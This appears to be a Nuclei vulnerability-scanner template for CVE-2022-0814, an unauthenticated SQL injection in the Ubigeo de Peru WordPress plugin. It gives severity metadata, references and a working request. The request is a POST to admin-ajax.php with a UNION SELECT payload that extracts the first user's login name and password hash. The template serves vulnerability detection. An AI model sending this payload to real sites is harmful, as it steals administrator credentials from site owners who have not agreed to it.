id: CVE-2022-0814 info: name: Ubigeo de Peru < 3.6.4 - SQL Injection author: r3Y3r53 severity: critical description: | The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections. remediation: Fixed in version 3.6.4 reference: - https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814 - https://wordpress.org/plugins/ubigeo-peru/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0814 cwe-id: CWE-89 epss-score: 0.05057 epss-percentile: 0.92125 cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: ubigeo_de_peru_para_woocommerce_project product: ubigeo_de_peru_para_woocommerce framework: wordpress publicwww-query: "/wp-content/plugins/ubigeo-peru/" tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users# matchers-condition: and matchers: - type: word part: body words: - 'idProv' - 'idDist' - 'distrito' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a0046304402207f94ae56f0991e1313cf35938d23142d38dc98041de514ff792f7afccb414b4102205bb7a999bcca2049c0439eeb971a42e7e59d499364f3d2a902ca48234b407304:922c64590222798bb761d5b6d8e72950